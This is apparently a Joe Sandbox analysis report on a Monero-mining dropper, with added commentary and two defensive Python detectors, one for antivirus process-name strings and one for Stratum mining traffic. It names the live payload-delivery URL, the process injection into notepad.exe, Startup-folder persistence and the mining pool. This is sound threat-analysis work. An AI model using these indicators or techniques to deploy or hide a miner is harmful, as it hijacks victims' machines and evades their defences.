Two kinds of evidence are mixed in this block. The eight process names sourced from 4rC1bQcnl5.exe itself (bdagent.exe, vsserv.exe, cmdagent.exe, cfp.exe, avp.exe, a2start.exe, a2guard.exe, a2service.exe) are strings the sample carries and are the strong indicator: a cluster of security-product process names from several vendors is what AV-termination or AV-avoidance logic looks like. The svchost.exe evidence is weaker. In the behavior graph the svchost.exe instance that writes the Security Center cval value is started from the analysis root rather than by the sample, goes on to start MpCmdRun.exe, and holds the Windows Defender MsMpeng.exe path in memory; that is consistent with the Windows Security Center / Defender service host doing its normal work rather than with code injected by the sample, whose injection targets in the graph are notepad.exe and oQOWFbKllEKo.exe. Check which service group that svchost.exe hosts (its command line) before counting the cval write and the ROOT\SecurityCenter2 enumeration as tampering by the sample.
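The process-name strings above are the kind of indicator that is cheap to hunt for across a file set. The following is an added example, not code from the sample, from Joe Sandbox or from any vendor: it scans a binary for the exact eight names the report found in 4rC1bQcnl5.exe, in both ASCII and UTF-16LE (wide strings, including the string heap of .NET assemblies, store "avp.exe" as a\x00v\x00p\x00..., so an ASCII-only search misses them), and flags a file only when several distinct names cluster. The vendor attributions in the comments are general knowledge, and the blob built by build_sample() is constructed for illustration rather than taken from the analysed file.

```python
"""Heuristic scan for clusters of security-product process names in a binary.

Added example for this report, not code from the sample, from Joe Sandbox or
from any vendor. The name list is the set of strings the report found in
4rC1bQcnl5.exe; build_sample() returns a constructed blob, not sample bytes.
"""
import re

# Process names the report lists under "Binary or memory string".
AV_PROCESS_NAMES = (
    "bdagent.exe", "vsserv.exe",                     # Bitdefender
    "cmdagent.exe", "cfp.exe",                       # COMODO
    "avp.exe",                                       # Kaspersky
    "a2start.exe", "a2guard.exe", "a2service.exe",   # Emsisoft
)


def _compile_patterns():
    """One ASCII and one UTF-16LE pattern per name.

    Wide strings (the #US string heap of a .NET assembly, most Win32 W-APIs)
    store 'avp.exe' as b'a\\x00v\\x00p\\x00...', so an ASCII-only grep misses
    them. re.IGNORECASE on a bytes pattern folds ASCII letters, which is all
    these names need; the NUL bytes stay literal.
    """
    pats = []
    for name in AV_PROCESS_NAMES:
        pats.append((
            name,
            re.compile(re.escape(name.encode("ascii")), re.IGNORECASE),
            re.compile(re.escape(name.encode("utf-16-le")), re.IGNORECASE),
        ))
    return pats


_PATTERNS = _compile_patterns()


def av_string_hits(data: bytes) -> dict:
    """Map each name found to its hit counts, e.g. {"avp.exe": {"ascii": 0, "utf16": 1}}."""
    hits = {}
    for name, ascii_pat, utf16_pat in _PATTERNS:
        a = len(ascii_pat.findall(data))
        u = len(utf16_pat.findall(data))
        if a or u:
            hits[name] = {"ascii": a, "utf16": u}
    return hits


def has_av_process_cluster(data: bytes, min_distinct: int = 3) -> bool:
    """True when several distinct names from the list appear in one file.

    A single name is weak evidence (an installer may legitimately check for a
    competing product); several names spanning vendors, as in this sample, is
    the pattern associated with AV-termination or AV-avoidance logic.
    """
    return len(av_string_hits(data)) >= min_distinct


def build_sample() -> bytes:
    """Constructed stand-in for a binary: filler, NUL-terminated wide strings, one narrow string."""
    blob = bytearray(b"MZ\x90\x00" + b"\x00" * 60)
    for name in ("bdagent.exe", "cmdagent.exe", "VSSERV.EXE", "avp.exe"):
        blob += name.encode("utf-16-le") + b"\x00\x00"   # wide strings, mixed case
    blob += b"\x00" * 16 + b"a2guard.exe\x00"             # one narrow (ASCII) string
    return bytes(blob)


if __name__ == "__main__":
    sample = build_sample()
    for name, counts in sorted(av_string_hits(sample).items()):
        print(f"{name:<16} ascii={counts['ascii']} utf16={counts['utf16']}")
    print("cluster:", has_av_process_cluster(sample))
```

Run it against a directory of PE files by feeding each file's bytes to has_av_process_cluster; the min_distinct threshold is the knob that trades false positives (security tooling and installers that name one or two products) against misses.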

Mitre Att&ck Matrix

Trailing digits after a technique name (for example "Process Injection622") are the report's superscript signature counters and are kept as they appear in the original; cells without digits are the matrix scaffold with no matching signature.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation1 | Startup Items1 | Startup Items1 | Masquerading21 | Input Capture1 | Security Software Discovery241 | Remote Services | Input Capture1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Command and Scripting Interpreter2 | Registry Run Keys / Startup Folder2 | Process Injection622 | Disable or Modify Tools11 | LSASS Memory | Virtualization/Sandbox Evasion31 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Scripting11 | DLL Side-Loading1 | Registry Run Keys / Startup Folder2 | Virtualization/Sandbox Evasion31 | Security Account Manager | Process Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Native API1 | Logon Script (Mac) | DLL Side-Loading1 | Process Injection622 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting11 | Cached Domain Credentials | System Information Discovery23 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information2 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing11 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | DLL Side-Loading1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction

                        Behavior Graph

Behavior Graph ID: 453466 | Sample: 4rC1bQcnl5 | Start date: 23/07/2021 | Architecture: WINDOWS | Score: 100

Signatures attached to the sample node: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 9 other signatures
DNS attached to the sample node: xmr-us-east1.nanopool.org

Process tree (indentation = started by the process above; "injected" = the graph's injection edge; "dropped" = file written by that process):

4rC1bQcnl5.exe (started)
    dropped: C:\Users\user\AppData\...\4rC1bQcnl5.exe (PE32)
    dropped: C:\Users\...\4rC1bQcnl5.exe:Zone.Identifier (ASCII)
    dropped: C:\Users\user\AppData\...\4rC1bQcnl5.exe.log (ASCII)
    signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
    4rC1bQcnl5.exe (started)
        network: 45.144.225.135:80 (DEDIPATH-LLCUS, Netherlands), local port 49717
        dropped: C:\ProgramData\LKBNMTFJgl\csrss (PE32)
        dropped: C:\ProgramData\LKBNMTFJgl\r.vbs (data)
        signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Modifies the context of a thread in another process (thread injection); 2 other signatures
        notepad.exe (started)
            network: 192.99.69.170:14444 (OVHFR, Canada), two connections from local ports 49718 and 49728
            DNS: xmr-us-east1.nanopool.org
            signatures: System process connects to network (likely due to code injection or exploit); Detected Stratum mining protocol (on the 192.99.69.170 connection)
        cmd.exe (started)
            wscript.exe (started)
                dropped: C:\Users\user\AppData\...\viTRMUuKeV.url (MS)
            conhost.exe (started)
        oQOWFbKllEKo.exe (injected)
    4rC1bQcnl5.exe (started)
        signatures: Multi AV Scanner detection for dropped file
svchost.exe (started)
    signatures: Changes security center settings (notifications, updates, antivirus, firewall)
    MpCmdRun.exe (started)
        conhost.exe (started)
svchost.exe (started)
    network: 127.0.0.1
8 other processes (started)
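The graph's most actionable edge is notepad.exe, a system binary the second stage injected into, talking to 192.99.69.170:14444 with the signature "Detected Stratum mining protocol". Stratum as spoken by Monero miners is newline-delimited JSON-RPC 2.0 over a plain TCP socket: the client sends a "login" carrying the wallet, a password, an agent string such as "XMRig/<version>" and the algorithms it supports ("rx/0" is RandomX, the Monero algorithm), the pool replies with a job, and the client answers with "submit" messages; Bitcoin-style pools use "mining.subscribe" / "mining.authorize" instead. The following is an added example, not code from the sample, from XMRig or from Joe Sandbox: a parser that walks a reassembled payload and collects the fields a detection would key on. SAMPLE_FLOW is constructed for illustration; its wallet, session id, job id, blob and nonce values are placeholders, not data from the analysed traffic.

```python
"""Recognise XMRig-style Stratum traffic in reassembled TCP payload.

Added example for this report, not code from the sample, from XMRig or from
Joe Sandbox. SAMPLE_FLOW is constructed; its wallet, session, job, blob and
nonce values are placeholders rather than captured data.
"""
import json
from dataclasses import dataclass, field

# Monero / CryptoNote pool dialect (what XMRig speaks) and the classic Bitcoin dialect.
MONERO_STRATUM_METHODS = {"login", "job", "submit", "keepalived", "getjob"}
CLASSIC_STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.notify",
    "mining.submit", "mining.set_difficulty",
}


@dataclass
class StratumEvidence:
    methods: set = field(default_factory=set)
    agents: set = field(default_factory=set)   # e.g. "XMRig/6.12.2 (...)"
    logins: set = field(default_factory=set)   # wallet addresses / worker names
    algos: set = field(default_factory=set)    # e.g. "rx/0" (RandomX, Monero)

    @property
    def is_mining(self) -> bool:
        # A lone recognised method name could be a coincidence in unrelated
        # JSON; insist on a method plus an agent string or a login.
        return bool(self.methods) and bool(self.agents or self.logins)


def parse_stratum_stream(payload: bytes) -> StratumEvidence:
    """Walk newline-delimited JSON and collect mining indicators from both directions."""
    ev = StratumEvidence()
    for raw in payload.split(b"\n"):
        raw = raw.strip()
        if not raw:
            continue
        try:
            msg = json.loads(raw)
        except ValueError:
            continue                      # not JSON: other traffic on the flow
        if not isinstance(msg, dict):
            continue
        method, params = msg.get("method"), msg.get("params")
        if not isinstance(method, str):
            method = None

        if method in MONERO_STRATUM_METHODS:
            ev.methods.add(method)
            if method == "login" and isinstance(params, dict):
                if params.get("login"):
                    ev.logins.add(str(params["login"]))
                if params.get("agent"):
                    ev.agents.add(str(params["agent"]))
                if isinstance(params.get("algo"), list):
                    ev.algos.update(str(a) for a in params["algo"])
            elif method == "job" and isinstance(params, dict) and params.get("algo"):
                ev.algos.add(str(params["algo"]))

        elif method in CLASSIC_STRATUM_METHODS:
            ev.methods.add(method)
            if isinstance(params, list) and params:
                if method == "mining.subscribe":
                    ev.agents.add(str(params[0]))   # user agent, e.g. "cpuminer/2.5.0"
                elif method == "mining.authorize":
                    ev.logins.add(str(params[0]))   # worker name / address

        # Monero-style login reply: the pool embeds the first job in "result".
        result = msg.get("result")
        if isinstance(result, dict) and isinstance(result.get("job"), dict):
            ev.methods.add("job")
            if result["job"].get("algo"):
                ev.algos.add(str(result["job"]["algo"]))
    return ev


def _line(obj) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode()


# Constructed exchange modelled on the Monero Stratum dialect (all values are placeholders).
SAMPLE_FLOW = b"\n".join([
    _line({"id": 1, "jsonrpc": "2.0", "method": "login",
           "params": {"login": "WALLET_PLACEHOLDER", "pass": "x",
                      "agent": "XMRig/6.12.2 (Windows NT 10.0; Win64; x64)",
                      "algo": ["rx/0", "cn/r"]}}),
    _line({"id": 1, "jsonrpc": "2.0", "error": None,
           "result": {"id": "SESSION_PLACEHOLDER", "status": "OK",
                      "job": {"blob": "0b0b" + "00" * 38, "job_id": "J1",
                              "target": "b88d0600", "algo": "rx/0", "height": 1}}}),
    _line({"id": 2, "jsonrpc": "2.0", "method": "submit",
           "params": {"id": "SESSION_PLACEHOLDER", "job_id": "J1",
                      "nonce": "0a000000", "result": "00" * 32}}),
    b"HTTP/1.1 200 OK",                  # unrelated line: skipped, not an error
])


if __name__ == "__main__":
    ev = parse_stratum_stream(SAMPLE_FLOW)
    print("mining:", ev.is_mining)
    print("methods:", sorted(ev.methods))
    print("agents:", sorted(ev.agents))
    print("logins:", sorted(ev.logins))
    print("algos:", sorted(ev.algos))
```

Port-based rules (14444 here) are brittle because pools accept many ports and miners can be configured to any of them; matching on the login/agent/algo structure of the first few lines of a flow is what survives a port change, and the wallet string in "login" is the pivot for linking infections to the same operator.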


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
4rC1bQcnl5.exe | 17% | Virustotal |
4rC1bQcnl5.exe | 24% | ReversingLabs | Win32.Trojan.Pwsx

Dropped Files

Source | Detection | Scanner | Label
C:\ProgramData\LKBNMTFJgl\csrss | 24% | ReversingLabs | Win32.Trojan.Pwsx
C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | 24% | ReversingLabs | Win32.Trojan.Pwsx

Unpacked PE Files

Source | Detection | Scanner | Label
17.0.oQOWFbKllEKo.exe.1460000.3.unpack | 100% | Avira | TR/ATRAPS.Gen
16.2.4rC1bQcnl5.exe.37c0000.4.unpack | 100% | Avira | TR/Dropper.Gen
17.0.oQOWFbKllEKo.exe.1460000.5.unpack | 100% | Avira | TR/ATRAPS.Gen
17.0.oQOWFbKllEKo.exe.1460000.1.unpack | 100% | Avira | TR/ATRAPS.Gen
16.2.4rC1bQcnl5.exe.4f3c38.0.unpack | 100% | Avira | HEUR/AGEN.1127349
16.2.4rC1bQcnl5.exe.400000.1.unpack | 100% | Avira | TR/ATRAPS.Gen
17.2.oQOWFbKllEKo.exe.1460000.1.unpack | 100% | Avira | TR/ATRAPS.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
https://xmrig.com/wizardOKcpurandomxversioncpuintensitythreadsaffinity | 0% | Avira URL Cloud | safe
http://45.144.225.135/notepad.exe | 100% | Avira URL Cloud | malware
http://45.144.225.135/config.txt | 0% | Avira URL Cloud | safe
http://www.fontbureau.comion | 0% | URL Reputation | safe
https://xmrig.com/wizard | 0% | URL Reputation | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://dynamic.t | 0% | URL Reputation | safe
http://www.fontbureau.comm | 0% | URL Reputation | safe
https://xmrig.com/docs/algorithms | 0% | URL Reputation | safe
https://RtlGetVersionntdll.dll | 0% | Avira URL Cloud | safe
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe

Several of these "URLs" are string-extraction run-ons rather than addresses: https://xmrig.com/wizardOKcpurandomxversioncpuintensitythreadsaffinity is the XMRig wizard URL followed by adjacent configuration keywords (randomx, threads, affinity) with no separator in the binary, https://RtlGetVersionntdll.dll is an ntdll export name fused with a library name, and the two fontbureau.com variants are font-metadata fragments. The xmrig.com references themselves are a useful indicator that the injected notepad.exe image is XMRig. The URL to act on is http://45.144.225.135/notepad.exe, on the host the second 4rC1bQcnl5.exe stage contacts over port 80 in the behavior graph, which Avira flags as malware; the neighbouring http://45.144.225.135/config.txt on the same host is rated "safe" only because reputation scoring has nothing on it.

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
xmr-us-east1.nanopool.org | 144.217.14.139 | true | false |  | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://45.144.225.135/config.txt | false | Avira URL Cloud: safe | unknown

The "Malicious: false" verdicts here and in the Contacted IPs table for 45.144.225.135 are reputation lookups only. The same host serves http://45.144.225.135/notepad.exe, which Avira rates as malware, and it is the only external host the second 4rC1bQcnl5.exe stage contacts before the mining payload appears in notepad.exe; treat the host as payload-delivery infrastructure regardless of the per-URL score. Likewise the pool domain's "Malicious: false" reflects that xmr-us-east1.nanopool.org is a public mining pool, not that the connection is benign in this context.

URLs from Memory and Binaries

Rows sourced from svchost.exe dumps (Bing Maps / virtualearth.net tile and routing endpoints, xboxlive.com, activity.windows.com, WS-Addressing schema URIs) are ordinary Windows service strings present on any Windows 10 v1803 host and are not attributable to the sample. The rows that belong to the sample are those sourced from 4rC1bQcnl5.exe and from the injected notepad.exe (process 00000012).

Name | Source | Malicious | Antivirus Detection | Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | false |  | high
https://xmrig.com/wizardOKcpurandomxversioncpuintensitythreadsaffinity | notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://45.144.225.135/notepad.exe | 4rC1bQcnl5.exe | true | Avira URL Cloud: malware | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 0000000B.00000003.306593475.000002B69C445000.00000004.00000001.sdmp | false |  | high
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmp | false |  | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | false |  | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmp | false |  | high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | false |  | high
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 0000000B.00000002.306962317.000002B69C44E000.00000004.00000001.sdmp | false |  | high
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmp | false |  | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmp | false |  | high
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | false |  | high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 0000000B.00000003.306603433.000002B69C440000.00000004.00000001.sdmp | false |  | high
http://schemas.xmlsoap.org/ws/2004/09/enume | svchost.exe, 00000005.00000002.494582549.0000015D344A3000.00000004.00000001.sdmp | false |  | high
http://www.fontbureau.comion | 4rC1bQcnl5.exe, 00000000.00000002.325812504.0000000001887000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 0000000B.00000002.306846674.000002B69C413000.00000004.00000001.sdmp; svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmp | false |  | high
https://xmrig.com/wizard | notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 0000000B.00000003.306603433.000002B69C440000.00000004.00000001.sdmp | false |  | high
https://%s.xboxlive.com | svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 0000000B.00000002.306962317.000002B69C44E000.00000004.00000001.sdmp | false |  | high
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | false |  | high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmp | false |  | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | false |  | high
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | false |  | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | false |  | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmp | false |  | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | false |  | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | svchost.exe, 00000005.00000002.498728475.0000015D39DF0000.00000002.00000001.sdmp | false |  | high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | false |  | high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 0000000B.00000003.306603433.000002B69C440000.00000004.00000001.sdmp | false |  | high
http://schemas.xmlsoap.org/ws/2004/08/addressing | svchost.exe, 00000005.00000002.494582549.0000015D344A3000.00000004.00000001.sdmp | false |  | high
https://dynamic.t | svchost.exe, 0000000B.00000002.306962317.000002B69C44E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | false |  | high
http://www.fontbureau.comm | 4rC1bQcnl5.exe, 00000000.00000002.325812504.0000000001887000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
https://iconscout.com/legal#licenses | 4rC1bQcnl5.exe | false |  | high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 0000000B.00000003.284408088.000002B69C432000.00000004.00000001.sdmp | false |  | high
https://xmrig.com/docs/algorithms | notepad.exe, 00000012.00000002.493724592.0000000000401000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
https://appexmapsappupdate.blob.core.windows.net | svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | false |  | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | false |  | high
https://activity.windows.com | svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmp | false |  | high
http://www.bingmapsportal.com | svchost.exe, 0000000B.00000002.306846674.000002B69C413000.00000004.00000001.sdmp | false |  | high
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 0000000B.00000003.306504094.000002B69C461000.00000004.00000001.sdmp | false |  | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 0000000B.00000002.306930208.000002B69C43D000.00000004.00000001.sdmp | false |  | high
https://RtlGetVersionntdll.dll | 4rC1bQcnl5.exe, 00000000.00000002.326329600.0000000003287000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://%s.dnet.xboxlive.com | svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | false |  | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 0000000B.00000003.306561749.000002B69C45A000.00000004.00000001.sdmp | false |  | high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.144.225.135 | unknown | Netherlands | 35913 | DEDIPATH-LLCUS | false
192.99.69.170 | unknown | Canada | 16276 | OVHFR | true

Private

IP
127.0.0.1

                                                                                                    General Information

                                                                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                                                                    Analysis ID:453466
                                                                                                    Start date:23.07.2021
                                                                                                    Start time:22:23:14
                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                    Overall analysis duration:0h 12m 19s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Sample file name:4rC1bQcnl5 (renamed file extension from none to exe)
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                    Number of analysed new started processes analysed:30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.mine.winEXE@25/14@2/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 98.4% (good quality ratio 92.6%)
• Quality average: 75.4%
• Quality standard deviation: 27.1%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
• Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 52.147.198.201, 23.211.6.115, 168.61.161.212, 104.43.193.48, 204.79.197.200, 13.107.21.200, 23.211.4.86, 20.82.210.154, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.54.110.249
• Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
22:24:22 | API Interceptor | 2x Sleep call for process: svchost.exe modified
22:25:22 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url
22:25:39 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
45.144.225.135 | P7Oa6i5muL.exe | malicious | 45.144.225.135/config.txt
45.144.225.135 | H9QnI1DbC1.exe | malicious | 45.144.225.135/config.txt
45.144.225.135 | 7xhLwiPIrR.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | qhgv3aRzkZ.exe | malicious | 45.144.225.135/conhost.exe
45.144.225.135 | zIrx1wUddJ.exe | malicious | 45.144.225.135/config.txt
45.144.225.135 | E91sLsvV8S.exe | malicious | 45.144.225.135/config.txt
45.144.225.135 | SecuriteInfo.com.Trojan.GenericKD.46284216.26505.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | notepad.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | taskhost.exe | malicious | 45.144.225.135/config2.txt
45.144.225.135 | csrss.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | notepad.exe | malicious | 45.144.225.135/config.txt
45.144.225.135 | RcyatUBgOo.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | 1fJCh9Qn75.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | xS9h6XCLaY.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | WHK1KXo5rL.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | ifulH09vsC.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | SecuriteInfo.com.Trojan.Siggen12.56619.6518.exe | malicious | 45.144.225.135/notepad.exe
45.144.225.135 | SecuriteInfo.com.__vbaHresultCheckObj.21994.exe | malicious | 45.144.225.135/config.txt
45.144.225.135 | SecuriteInfo.com.Trojan.Siggen12.45962.28547.exe | malicious | 45.144.225.135/godeth.exe
45.144.225.135 | SecuriteInfo.com.Variant.Johnnie.321295.17359.exe | malicious | 45.144.225.135/config.txt
192.99.69.170 | csrss.exe | malicious |

Domains

Match | Associated Sample Name / URL | Detection | Context
xmr-us-east1.nanopool.org | 4HoFnQosUb.exe | malicious | 142.44.242.100
xmr-us-east1.nanopool.org | P7Oa6i5muL.exe | malicious | 142.44.242.100
xmr-us-east1.nanopool.org | H9QnI1DbC1.exe | malicious | 144.217.14.139
